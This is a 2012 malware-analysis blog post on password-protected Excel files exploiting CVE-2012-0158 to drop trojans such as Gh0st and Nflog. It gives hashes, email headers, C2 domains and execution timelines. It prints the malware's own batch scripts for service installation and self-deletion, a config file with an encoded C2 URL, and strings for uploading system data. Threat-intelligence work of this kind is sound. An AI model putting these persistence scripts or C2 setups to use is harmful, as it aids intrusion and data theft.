Clicky

Pages

Thursday, August 9, 2012

CVE-2012-0158 generated "8861 password" XLS samples and analysis



Symantec recently posted an article by Joji Hamada titled "Password “8861” Used in Targeted Attacks", where the attackers continuously using the same passwords sent in emails together with the malicious attachment. Indeed, the password not only allows to evade detection but also makes it difficult to analyse the exploit itself.

All the samples i have that have this password appear to be created via a generator and share certain similarities. I will point out a few but you can find many more if you analyse the files and payloads.  


- Exploit CVE-2012-0158
The hallmark ListView2, 1, 1, MSComctlLib, ListView are clearly seen in the files, as well as excessive calls to MSCOMCTL.OCX during the dynamic analysis.

- Same password 
8861 could be the attacker's lucky number, or it is job related, or being a primary number, it plays some role in the RSA encryption implementation in this generator ( this one perhaps is a bit far fetched, but not more than other theories)

- Antivirus/Malware detection

These files are mostly detected as Exploit.D-Encrypted  by different AV vendors but this signature detects other malicious password protected documents  - it is not limited to this 8861 generator files.


Yara SignaturesYou can develop your own yara signatures based on these and other indicators you find in the files. I will share signatures on Yara Signature Exchange Google Group. If you are interested in making and sharing, please see DeepEnd Research: Yara Signature Exchange Google Group
IDS:  Emerging threats IDS signatures - see below.


- Same file structure
They are each different sizes and have different payloads, however the first 120KB of each file are identical and are completley different from the headers of other typical user created password protected spreadsheets and other malicious and password protected XLS files. I will post two other malicious messages that were NOT generated using the same generator is seems and have a different password  (I don't know password for those two files yet, if your figure it out, please share)

- Same document code page 
Windows Simplified Chinese (PRC, Singapore)

- Same name for the dropped files (ews.exe and set.xls
The dropped payload and the clean XLS document are different sizes, different types of malware for trojans, but have the same names (some are renamed after creation), which suggests a template. The embedded clean XLS documents have different metadata - I guess those were downloaded from internet or stolen from different targets - some were created on the Kingsoft version of Office, different authors, etc.

- Non default encryption (RC4, Microsoft RSA SChannel Cryptographic Provider).
Default is "Office 97/2000 compatible", which I think is 40-bit RC4 encryption. The generator is probably not using Excel interface but has it's own implementation of the encryption for the VBA code.

- Targets do not seem to be related by their occupation
Targets are in different countries  - Japan, China, France and do not seem to be related by business or industry - human rights activists, businesses, politicians. This makes me think it is not the same group of attackers but it is just a generator purchased by/supplied to different groups attacking different targets. The same trojan types, C2 domains, and targets were covered on Contagio and other resources earlier.
CVE #

CVE-2012-0158

The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers "system state" corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability."

Download

Many thanks to anonymous for sharing. Payload data for other Excel files is coming soon.


Original Message
This is an example of a targeted message for one of the attachments (New Microsoft excel table.xls) 
211.174.163.103 - poor reputation, spammer

Received: from xxxxxxxxxxxxxxxx ([172.25.22.235]) by xxxxxxxxxxxxxxxxxx (xxxxxxxxxxxxx) (using TLSv1/SSLv3 with cipher AES256-SHA (256 bits)) for xxxxxxxxxxxxxxxxxxxx; Wed, 25 Jul 2012 09:43:21 +0200
Reply-To: <jiaoguobiao3@sina.com>
Received: from [172.25.18.171] (port=48602 helo=xxxxxxxxxxxx) by smtp-xxxxxxxxxxxxxxxxx with esmtp id 1StwFd-0002R0-KA for xxxxxxxxxxxxxxxxxxx; Wed, 25 Jul 2012 09:43:21 +0200
From: <jiaoguobiao3@sina.com>
Sender: <jiaoguobiao3@sina.com>
Received: from [172.25.18.133] (port=14641 helo=xxxxxxxxxxxxxxxxxxx) by xxxxxxxxxxxxxx with smtp id 1StwFd-0006Hi-74 for xxxxxxxxxxxxxxxxxxxx; Wed, 25 Jul 2012 09:43:21 +0200
To: xxxxxxxxxxxxx
Received: from (unknown [172.25.18.172]) by XXXXXXXXXXXX with smtp id XXXXXXXXXXXXX; Wed, 25 Jul 2012 09:43:19 +0200
Received: from [58.63.234.169] (port=26328 helo=mail234-169.sinamail.sina.com.cn) by XXXXXXXXXXXXXX with esmtp id 1StwFY-0000ms-HZ for XXXXXXXXXXX; Wed, 25 Jul 2012 09:43:20 +0200
X-Originating-IP: [211.174.163.103]
X-IronPort-Anti-Spam-Filtered: true
X-IronPort-Anti-Spam-Result: AlEDAKU/KE/TrqNn/3poAAyBUw
Received: from unknown (HELO webmail.sinamail.sina.com.cn) ([10.71.1.38])  by irgz1-219.sinamail.sina.com.cn with ESMTP; 25 Jul 2012 15:43:11 +0800
Received: by webmail.sinamail.sina.com.cn (Postfix, from userid 80) id 52B3F5F8035; Wed, 25 Jul 2012 15:43:11 +0800 (CST)
Date: Wed, 25 Jul 2012 15:43:11 +0800
Received: from jiaoguobiao3@sina.com([211.174.163.103]) by m1.mail.sina.com.cn via HTTP; Wed, 25 Jul 2012 15:43:11 +0800 (CST)
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_001F_01CD6E72.04563CA0";
charset="gb2312"
Subject: Application
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-MessageID: 1343202191.3101.29137
X-Mailer: Sina WebMail 4.0
Message-ID: <20120725074311.52B3F5F8035@webmail.sinamail.sina.com.cn>
X-NAI-Spam-Flag: NO
X-NAI-Spam-Level: *
X-NAI-Spam-Threshold: 7
Importance: Normal
X-NAI-Spam-Score: 1.2
X-NAI-Spam-Report: 3 Rules triggered*  1 -- BODY_ONE_LINE_ATTACH_ONLY*  0.2 -- GEN_SPAM_FEATRE*  0 -- RV4289
X-NAI-Spam-Version: 2.2.0.9309 : core <4289> : streams <790053> : uri <1174304>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.6157

211.174.163.103
Host reachable, 265 ms. average
211.174.128.0 - 211.174.255.255
ELIMNET, INC.
Korea, Republic of
IP Administrator
Choongjungno3-Ka Seodaemoon-Gu
Elimnet Bldg, 32-11
phone: +82-2-3149-4923
noc@elim.net

File Information
"8861 GENERATOR" FILES (payload in some cases gets immediately renamed upon creation)

Clean decoy set.xls: blank. 
Message target: French Government and Chinese individuals
Payload ews.exe: b1d09374006e20fa795b2e70bf566c6d   dropper for Gh0st trojan (not sure about the name)
SSDeep: 6144:dbL6vr7ZtpxBbi636Ls0b6HKqtAFCOjjBXa9/hcp8Rm:dbL6zdPxBb56LPDXa9/hiAm
9E82BA53F3D26E04207064ED8BDAA44A

Clean decoy set.xls: a document related to Japanese manufacturing
Payload ews.exe: 0612B3138179852A416379B3E85742EA  dropper for Trojan Nflog (see Contagio for the same trojan)
SSDeep: 
3072:dbT46lL8vAyt1BIq5OO0ME+5pU5QDBbi2D36LsD4/D63/NB0C1jlEWHsOR:dbL6vr7ZtpxBbi636Ls0b6V6JWMOR
46AC122183C32858581E95EF40BD31B3

Clean decoy set.xls: a Japanese document
Payload ews.exe:  63d7ad4f9a5e8ede0218bad6e8d5c2e6  dropper for Trojan Taidoor (see Contagio for the same trojan)
SSDeep 3072:dbT46lL8vAyt1BIq5OO0ME+5pU5QDBbi2D36LsD4/D63/nGpOiz3EX:dbL6vr7ZtpxBbi636Ls0b6P4O4K
7A0D5BB0CA9992826BAD0B2241C4992B

Clean decoy set.xls:  a Japanese document
Payload ews.exe:  49F721DCA02C8F996C267DE26E2AA70C dropper for Trojan Nflog (see Contagio for the same trojan)
SSdeep: 3072:dbT46lL8vAyt1BIq5OO0ME+5pU5QDBbi2D36LsD4/D63/tGlbwwQJLsD4/D6E:dbL6vr7ZtpxBbi636Ls0b6HLLs0b6E
8D823C0A3DADE8334B6C1974E2D6604F

Clean decoy set.xls: a Japanese document
Payload ews.exe e750d80055c38747aac5ac91bc0bd29d dropper for Trojan PoisonIvy
SSDeep 6144:dbL6vr7ZtpxBbi636Ls0b64/gbhwD/nv/LMezJUJwf:dbL6zdPxBb56LPzoa7nHLMezJUJG
6BB32CE95FBFAADAD19212080ED0268B

6. Seminiar.xls
Message target and set.xls:  human rights activists in China
Payload ews.exe: dropper for Trojan RAT Lurk read about Lurk here http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf)
MD5 and sample currently unavailable  

==============================
"NON - 8861" FILES for comparison  - presumably malicious. Password unknown. 
a .Dharamsala August 2012 Full program.xls 971f99af0f9df674a79507ed7b3010fb
b. EIDHR_action_plan.xlsx 0fe550a5d1187d38984c505ef7741638

Payload details
Kingsoft office metadata in the clean decoy file
Clean decoy set.xls: blank. 
Message target: French Government and Chinese individuals
Payload ews.exe: b1d09374006e20fa795b2e70bf566c6d   dropper for Gh0st trojan  (correct me if I am wrong)

SSDeep: 6144:dbL6vr7ZtpxBbi636Ls0b6HKqtAFCOjjBXa9/hcp8Rm:dbL6zdPxBb56LPDXa9/hiAm
9E82BA53F3D26E04207064ED8BDAA44A

File: iexplore.exe   Size: 123932   MD5:  b1d09374006e20fa795b2e70bf566c6d (VT 1/42)
File: set.xls            Size: 7168      MD5:  726708CA086BF952266FADB9D655022D
File: srvlic.dll         Size: 8704      MD5:   4a886c0f6e2c578207c2e26f9e452fae (VT 0/42)
File: keybyd.dat    Size: 32768    MD5:  071cc2261ebcf789a447317778cdf048(VT 1/42)
File: Del.bat          Size: 267        MD5:  12952BA491F972210EAB536942EB5075
File: syslog.dat      Size: 1647      MD5:  D1F2D54118CB4EB488A1340367E23268


Timeline and generated files. 

file Write C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE -> %Temp%\Excel8.0\MSComctlLib.exd
file Write C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE -> %Temp%\set.xls
file Write C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE -> %Temp%\ews.exe
file Write %Temp%\ews.exe -> %Application Data%\iexplore.exe
file Write %Temp%\ews.exe -> %Temp%\Del.bat
file Write %Temp%\ews.exe -> C:\WINDOWS\system32\srvlic.dll
file Write %Temp%\ews.exe -> %Temp%\keybyd.dat
file Write C:\WINDOWS\system32\cmd.exe - > \deleted_files\Del.bat
file Write %Application Data%\iexplore.exe -> %Temp%\syslog.dat
process terminated C:\WINDOWS\system32\cmd.exe -> ..OFFICE11\EXCEL.EXE
iexplore.exe gets renamed to text.dat

File strings and system calls suggest it is a version of Gh0st rat with keylog
http://read.pudn.com/downloads112/sourcecode/delphi_control/470224/Server/svchost/common/KernelManager.cpp__.htm
%temp%Loop_KeyboardManager%temp%\keybyd.datLoop_HookKeyboard
Mutexes
Mutant Name Process Name Process ID
ShimCacheMutex iexplore.exe 1348 (iexplore.exe)
MutexObject    iexplore.exe 1348 (iexplore.exe)

Registry change  Created key 
LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\msvideo

File: Del.bat          Size: 267        MD5:  12952BA491F972210EAB536942EB5075
Local Settings\Temp\Del.bat
noDesKfile 
echo %time%>NUL
move "C:\DOCUME~1\Laura\LOCALS~1\Temp\ews.exe" C:\DOCUME~1\Laura\LOCALS~1\Temp\test.dat 
if exist "C:\DOCUME~1\Laura\LOCALS~1\Temp\ews.exe" goto noDesKfile 
del %0 && "C:\Documents and Settings\Laura\Application Data\iexplore.exe"

File: syslog.dat MD5:  d1f2d54118cb4eb488a1340367e23268 Size: 1647

Ascii Strings:
--------------
ohPRSPORZORWBPQXV[XW[B1
KohohPRSPORZORWBPQXWRXPRB1
KohohPRSPORZORWBPQXWPXRZB1



lixht.gnway.net
121.63.150.15  

   China
AS4134 Chinanet
CHINANET HUBEI PROVINCE NETWORK
netuser.dns1.us 27.22.117.26
  China  
AS4134 Chinanet
CHINANET HUBEI PROVINCE NETWORK

Historical data for these domains/IPS
first seen 2012-05-21 13:39:03 -0000
last seen 2012-05-21 13:39:03 -0000
netuser.dns1.us. A 111.177.86.236

first seen 2012-05-16 15:24:25 -0000
last seen 2012-05-17 07:18:15 -0000
netuser.dns1.us. A 111.177.86.240

#2                                                                  

2. qȐ}(24.7.1).xls 
Clean decoy set.xls: a document related to Japanese manufacturing
Payload ews.exe: 0612B3138179852A416379B3E85742EA  dropper for Trojan Nflog (see Contagio for the same trojan)
SSDeep: 
3072:dbT46lL8vAyt1BIq5OO0ME+5pU5QDBbi2D36LsD4/D63/NB0C1jlEWHsOR:dbL6vr7ZtpxBbi636Ls0b6V6JWMOR
46AC122183C32858581E95EF40BD31B3

Trojan Nflog was covered more than once before on Contagio and other sources. ET signatures exist for the traffic patterns http://lists.emergingthreats.net/pipermail/emerging-sigs/2012-February/017394.html.
The trojan collects all system logs and data and uploads them to C2 server in a very verbose form as you see below.

List of files

  1. File: iexpl001.tmp       Size: 25600    MD5:  0612B3138179852A416379B3E85742EA - main dropper
  2. File: NfIpv6.ocx         Size: 15360    MD5:  D9A5A885E2A90088B7F94E094697A932 
  3. File: iexp.bat                Size: 155       MD5:  61B07E9565745DFFE72C759BB8227B58
  4. File: YahooCache.ini   Size: 165        MD5:  1F38834AC81A382C22777C7A27432328 - config file
  5. File: $NtUninstallKB942388$           MD5:  c7a6c3a3bf556b011a4d40224e83d43d  - system data
  6. File: MSMAPI.OCX  Size: 67072    MD5:  A3D3B0686E7BD13293AD0E63EBEC67AF 
  7. File: CAServer.exe     Size: 62976     MD5:  4FB872E0D0FC1A016C93C573A976D85D dropper for the backdoor service installer
  8. File: ~mcd.dat              Size: 0                                                                                             
  9. File: IntelAMTPP.dll  Size: 10485760 MD5:  EBD1F5E471774BB283DE44E121EFA3E5 - backdoor service installer
  10. File: Nfile.asp            Size: 67080  MD5:  2866C12CE666D6B15FC6E32D968BA57B  - downloaded binary  - there is an 8 byte padding ( 36 37 30 37 32 00 D3 77 ) before the PE header, remove it and you get  MD5:  A3D3B0686E7BD13293AD0E63EBEC67AF - the main NFlog trojan   
Abbreviated timeline and created files - including activities during stage 2 of the attack - Note the 2nd stage starts more than an hour after the infection
6/8/2012 1:43:22.142,"file","Write".\OFFICE11\EXCEL.EXE->\Local Settings\Temporary Internet Files\Content.MSO\E207C016.emf
6/8/2012 1:43:23.596,"file","Write".\OFFICE11\EXCEL.EXE->%Temp%\Excel8.0\MSComctlLib.exd
6/8/2012 1:43:37.830,"process","created"%Temp%\ews.exe->\system32\cmd.exe
6/8/2012 1:43:32.486,"file","Write".\OFFICE11\EXCEL.EXE->%Temp%\set.xls
6/8/2012 1:43:32.549,"file","Write".\OFFICE11\EXCEL.EXE->%Temp%\ews.exe (gets renamed to  iexpl001.tmp)
6/8/2012 1:43:33.190,"file","Write"%Temp%\ews.exe->C:\WINDOWS\Temp\NfIpv6.ocx
6/8/2012 1:43:33.299,"file","Write"%Temp%\ews.exe->C:\WINDOWS\Temp\YahooCache.ini
6/8/2012 1:44:3.987,"file","Write"C:\WINDOWS\system32\svchost.exe->C:\Documents and Settings\NetworkService\IETldCache\index.dat
6/8/2012 1:44:13.81,"file","Write"C:\WINDOWS\system32\svchost.exe->C:\WINDOWS\Temp\MSMAPI.OCX
6/8/2012 1:44:15.97,"process","created"C:\WINDOWS\system32\svchost.exe->\system32\cmd.exe
6/8/2012 1:44:15.378,"process","created"C:\WINDOWS\system32\cmd.exe->\system32\ipconfig.exe
6/8/2012 1:44:15.972,"process","terminateC:\WINDOWS\system32\svchost.exe->\system32\cmd.exe
6/8/2012 1:44:15.972,"file","Write"C:\WINDOWS\system32\svchost.exe->C:\WINDOWS\Temp\$NtUninstallKB942388$
6/8/2012 1:44:16.3,"process","created"C:\WINDOWS\system32\svchost.exe->\system32\cmd.exe
6/8/2012 1:44:16.238,"process","created"C:\WINDOWS\system32\cmd.exe->\system32\net.exe
6/8/2012 1:44:16.550,"process","created"C:\WINDOWS\system32\net.exe->\system32\net1.exe
6/8/2012 1:44:17.128,"process","created"C:\WINDOWS\system32\cmd.exe->\system32\tasklist.exe
6/8/2012 1:44:17.378,"process","created"C:\WINDOWS\system32\svchost.exe->\system32\wbem\wmiprvse.exe
6/8/2012 1:44:18.394,"process","created"C:\WINDOWS\system32\cmd.exe->\system32\systeminfo.exe
6/8/2012 1:44:22.878,"process","created"C:\WINDOWS\system32\cmd.exe->\system32\netstat.exe
6/8/2012 1:45:21.925,"process","terminateC:\WINDOWS\system32\svchost.exe->\system32\wbem\wmiprvse.exe
STAGE 2
6/8/2012 2:59:34.664,"file","Write"C:\WINDOWS\system32\svchost.exe->C:\WINDOWS\Temp\MyTmpFile.Dat
6/8/2012 3:0:22.994,"file","Write"C:\WINDOWS\system32\systeminfo.exe->C:\WINDOWS\Temp\~mcd.dat
6/8/2012 3:7:9.255,"file","Write"C:\WINDOWS\system32\svchost.exe->C:\WINDOWS\CAServer.exe
6/8/2012 3:7:21.709,"file","Write"C:\WINDOWS\system32\cmd.exe->C:\WINDOWS\Temp\~mcd.dat
6/8/2012 3:7:21.740,"process","terminated"C:\WINDOWS\system32\svchost.exe->\system32\cmd.exe
6/8/2012 3:7:45.976,"process","created"C:\WINDOWS\system32\svchost.exe->\system32\cmd.exe
6/8/2012 3:7:46.116,"process","created"C:\WINDOWS\system32\cmd.exe->C:\WINDOWS\CAServer.exe
6/8/2012 3:7:48.257,"file","Write"C:\WINDOWS\CAServer.exe->C:\Program Files\Common Files\Driver\IntelAMTPP.dll
6/8/2012 3:7:51.351,"file","Write"C:\WINDOWS\CAServer.exe->C:\Program Files\Common Files\Driver\init.bat
6/8/2012 3:7:51.366,"process","created"C:\WINDOWS\CAServer.exe->\system32\cmd.exe
6/8/2012 3:7:51.538,"file","Write"C:\WINDOWS\CAServer.exe->C:\WINDOWS\Temp\iexp.bat
6/8/2012 3:7:51.616,"process","terminated"C:\WINDOWS\system32\svchost.exe->\system32\cmd.exe
6/8/2012 3:7:51.820,"process","created"C:\WINDOWS\system32\cmd.exe->\system32\rundll32.exe
6/8/2012 3:7:51.945,"process","created"C:\WINDOWS\system32\cmd.exe->\system32\attrib.exe
6/8/2012 3:7:52.288,"file","Write"C:\WINDOWS\system32\cmd.exe.->.\deleted_files\C\WINDOWS\CAServer.exe
6/8/2012 3:7:52.288,"file","Delete"C:\WINDOWS\system32\cmd.exe->C:\WINDOWS\CAServer.exe
6/8/2012 3:7:52.351,"file","Write"C:\WINDOWS\system32\cmd.exe.->.\deleted_files\C\WINDOWS\Temp\iexp.bat
6/8/2012 3:7:52.351,"file","Delete"C:\WINDOWS\system32\cmd.exe->C:\WINDOWS\Temp\iexp.bat
6/8/2012 3:7:52.820,"process","created"C:\WINDOWS\system32\net.exe->\system32\net1.exe
6/8/2012 3:7:52.945,"file","Write"System->C:\PROGRA~1\COMMON~1\Driver\init.bat
6/8/2012 3:7:52.945,"file","Write","SystemSystem->..\deleted_files\C\WINDOWS\CAServer.exe"
6/8/2012 3:7:53.54,"process","created"C:\WINDOWS\system32\svchost.exe->\system32\cmd.exe
6/8/2012 3:7:53.242,"process","created"C:\WINDOWS\system32\cmd.exe->\system32\ipconfig.exe
6/8/2012 3:7:53.945,"file","Write"System->..\deleted_files\C\WINDOWS\Temp\iexp.bat"
6/8/2012 3:7:54.38,"process","terminated"C:\WINDOWS\system32\cmd.exe->\system32\ipconfig.exe
6/8/2012 3:7:54.85,"process","terminated"C:\WINDOWS\system32\svchost.exe->\system32\cmd.exe
6/8/2012 3:7:55.38,"process","terminated"C:\WINDOWS\system32\net.exe->\system32\net1.exe
6/8/2012 3:7:55.54,"process","terminated"C:\WINDOWS\system32\cmd.exe->\system32\net.exe
6/8/2012 3:7:55.70,"file","Write"C:\WINDOWS\system32\cmd.exe->..\deleted_files\C\Program Files\Common Files\Driver\init.bat
6/8/2012 3:7:55.70,"file","Delete"C:\WINDOWS\system32\cmd.exe->C:\Program Files\Common Files\Driver\init.bat
6/8/2012 3:7:55.101,"process","terminated"C:\WINDOWS\CAServer.exe->\system32\cmd.exe
6/8/2012 3:7:55.945,"file","Write",System->..\deleted_files\C\Program Files\Driver\init.bat"
6/8/2012 3:7:58.320,"file","Write"C:\WINDOWS\system32\svchost.exe->%Local Settings%\Temporary Internet Files\Content.IE5\BWHA22TU\ct_datangcun_com[1]






Registry change - installation of  WmdmPmSp service - more than an hour after the infection
Key Name:          HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSpData:            Windows Infrared Port Monitor.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Wmdm
Last Write Time:   8/6/2012 - 3:07 AMC:\Progra~1\common~1\Driver\IntelAMTPP.dll

File: iexpl001.tmp  Size: 25600  MD5:  0612B3138179852A416379B3E85742EA
ASCI strings
00000162
\temp\
NfIpv6.ocx
SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run
wmiprivse.exe
net start IPRIP
sc start iprip 'cmd' 1
 /A /C
NfIpv6.ocx,RundllInstallA IPRIP
 /A /C rundll32
ComSpec
cmd.exe
MSMAPI.OCX,RunProcGoA
MSMAPI.OCX
NfIpv6.ocx,RunInstallA
rundll32.exe
YahooCache.ini

File: YahooCache.ini  Size: 165 MD5:  1F38834AC81A382C22777C7A27432328
Config file
[cpar]

m_ID=KH120719new*
m_Proc=SVCHOST.EXE
m_MainUrl=d3d3Lm1saXRqY2FiLmNvbQ==
m_BackUrl=d3d3Lm1saXRqY2FiLmNvbQ==
m_DllName=TVNNQVBJLk9DWA==
isFirst=notFirst

Bease64 encoded data in the config file
TVNNQVBJLk9DWA== MSMAPI.OCX d3d3Lm1saXRqY2FiLmNvbQ==www.mlitjcab.com


File: MSMAPI.OCX  Size: 67072  MD5:  A3D3B0686E7BD13293AD0E63EBEC67AF
ASCI strings
No cmd Info!0000000000000000000000000000000000000000%s:%d\cmd.exe /C dir "%userprofile%\recent\"net viewnetstat -ansysteminfotasklistnet startipconfig /all255.255.255.0AuthPortcparAddress\temp\YahooCache.inim_IDm_MainUrl
1000501C: 'SvcHostDLL.exe',0
10005050: 'RegSetValueEx(ServiceDll)',0
1000506C: 'ServiceDll',0
10005078: 'Parameters',0
10005084: 'RegCreateKeyA',0
10005094: 'Advapi32',0
100050A0: 'SYSTEM\CurrentControlSet\Services\',0
100050C4: 'Net address translation for IPv6 Protocol.',0
100050F0: 'IPv6 Stack Local Support',0
1000510C: '%SystemRoot%\System32\svchost.exe -k netsvcs',0
1000513C: 'netsvcs',0
10005144: 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost',0
1000517C: 'IPRIP',0
10005184: 'NfIpv6.ocx',0
10005190: 'NfcoreOk',0
1000519C: 'm_Proc',0
100051A4: 'm_DllName',0
100051B0: 'm_MainUrl',0
100051BC: 'm_BackUrl',0
100051C8: 'cpar',0
100051D0: 'm_ID',0
100051D8: 'YahooCache.ini',0
100051E8: 'NfLog/Nfile.asp',0
100051F8: 'GetFile',0
10005200: 'ProcGo',0
10005208: 'HTTP/1.1',0
10005214: 'Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1)',0
10005248: '%s:%d',0
10005250: 'Auth',0
10005258: 'Port',0
10005260: 'Address',0
1000526C: '\Temp\',0
10005274: 'InternetSetOptionA',0
10005288: 'InternetReadFile',0
1000529C: 'InternetOpenA',0
100052AC: 'InternetConnectA',0
100052C0: 'InternetCloseHandle',0
100052D4: 'HttpSendRequestA',0
100052E8: 'HttpQueryInfoA',0
100052F8: 'HttpOpenRequestA',0
1000530C: 'HttpEndRequestA',0
1000531C: 'wininet.dll',0
10005334: 'www.microsoft.com',0
10005350: 'Proxy-Authorization: Basic ',0
1000536C: 'HTTP://',0
10005374: 'HEAD',0
1000537C: 'POST',0


File: $NtUninstallKB942388$  MD5:  c7a6c3a3bf556b011a4d40224e83d43d  Size: 8591  - full systeminfo dump
Ascii Strings:
---------------------------------------------------------------------------
C:\WINDOWS\system32\ipconfig /all
Windows IP Configuration
        Host Name . . . . . . . . . . . . : DellXT
        Primary Dns Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Hybrid
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No
        DNS Suffix Search List. . . . . . : localdomain
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . : localdomain
        Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
        Physical Address. . . . . . . . . : 00-50-56-3C-F6-41
        Dhcp Enabled. . . . . . . . . . . : Yes
        Autoconfiguration Enabled . . . . : Yes
        IP Address. . . . . . . . . . . . : 192.168.106.141
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.106.2
        DHCP Server . . . . . . . . . . . : 192.168.106.254
        DNS Servers . . . . . . . . . . . : 192.168.106.2
        Primary WINS Server . . . . . . . : 192.168.106.2
        Lease Obtained. . . . . . . . . . : Monday, August 06, 2012 1:32:20 AM
        Lease Expires . . . . . . . . . . : Monday, August 06, 2012 2:02:20 AM
C:\WINDOWS\system32\net start
These Windows services are started:
   Application Layer Gateway Service
   Bluetooth Support Service
   COM+ Event System
   Cryptographic Services
   DCOM Server Process Launcher
   DHCP Client
   Distributed Link Tracking Client
   DNS Client
   Error Reporting Service
   ESET Service
   Event Log
[abbreviated]-----------------
   Windows User Mode Driver Framework
   Wireless Zero Configuration
   Workstation
The command completed successfully.
C:\WINDOWS\system32\tasklist
Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
System                         4 Console                 0        240 K
smss.exe                     552 Console                 0        388 K
csrss.exe                    624 Console                 0      2,816 K
winlogon.exe                 648 Console                 0      3,128 K
[abbreviated]---------------
TPAutoConnect.exe            968 Console                 0      4,528 K
ctfmon.exe                   224 Console                 0      3,044 K
cmd.exe                     1056 Console                 0         92 K
EXCEL.EXE                    368 Console                 0     11,640 K
cmd.exe                      940 Console                 0      2,316 K
tasklist.exe                 276 Console                 0      3,972 K
wmiprvse.exe                1468 Console                 0      5,384 K
C:\WINDOWS\system32\systeminfo
Host Name:                 DELLXT
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 2 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          admin
Registered Organization:
Product ID:                76487-641-3817835-23453
Original Install Date:     11/15/2011, 9:24:04 AM
System Up Time:            28 Days, 1 Hours, 5 Minutes, 19 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 26 Stepping 5 GenuineIntel ~2660 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-05:00) Eastern Time (US & Canada)
Total Physical Memory:     1,023 MB
Available Physical Memory: 752 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use:    40 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WUC
Logon Server:              N/A
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: Q147222
                           [03]: KB911164 - Update
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.106.254
                                 IP address(es)
                                 [01]: 192.168.106.141
C:\WINDOWS\system32\netstat -an
Active Connections
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1025         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:5152         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:5152         127.0.0.1:1036         CLOSE_WAIT
  TCP    192.168.106.141:139    0.0.0.0:0              LISTENING
  TCP    192.168.106.141:1065   64.4.11.42:80          ESTABLISHED
  TCP    192.168.106.141:1066   112.175.245.222:80     ESTABLISHED
  UDP    0.0.0.0:445            *:*                  
  UDP    0.0.0.0:500            *:*                  
  UDP    0.0.0.0:1032           *:*                  
  UDP    0.0.0.0:4500           *:*                  
  UDP    127.0.0.1:123          *:*                  
  UDP    127.0.0.1:1900         *:*                  
  UDP    192.168.106.141:123    *:*                  
  UDP    192.168.106.141:137    *:*                  
  UDP    192.168.106.141:138    *:*                  
  UDP    192.168.106.141:1900   *:*                  
C:\WINDOWS\system32\net view
System error 6118 has occurred.
The list of servers for this workgroup is not currently available
C:\WINDOWS\system32\dir "%userprofile%\recent\"
The system cannot find the file specified.

Unicode Strings:




File: init.bat  Size: 123  MD5:  729865A05053FC1A447694A6A6B943A1

@Echo off
rundll32.exe C:\Progra~1\common~1\Driver\IntelAMTPP.dll,RundllInstall WmdmPmSp
net start WmdmPmSp
del %0


File: iexp.bat Size: 155 MD5:  61B07E9565745DFFE72C759BB8227B58
@echo off
:selfkill
attrib -a -r -s -h "c:\windows\CAServer.exe"
del "c:\windows\CAServer.exe"
if exist "c:\windows\CAServer.exe" goto selfkill
del %0

\File: IntelAMTPP.dll  Size: 10485760 MD5:  EBD1F5E471774BB283DE44E121EFA3E5
This file is padded with zeros to 10MB to evade detection. I saw files padded up to 22-25 mb to avoid uploads to Virtustotal.
10006210: 'USER32.dll',0
10006220: 'ADVAPI32.dll',0
10006240: 'WININET.dll',0
10006250: 'iphlpapi.dll',0
10006260: 'WS2_32.dll',0
10007014: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
10007058: 'Connection:close',0
1000706C: 'Cache-Control: max-age=259200',0
1000708C: 'Pragma: no-cache',0
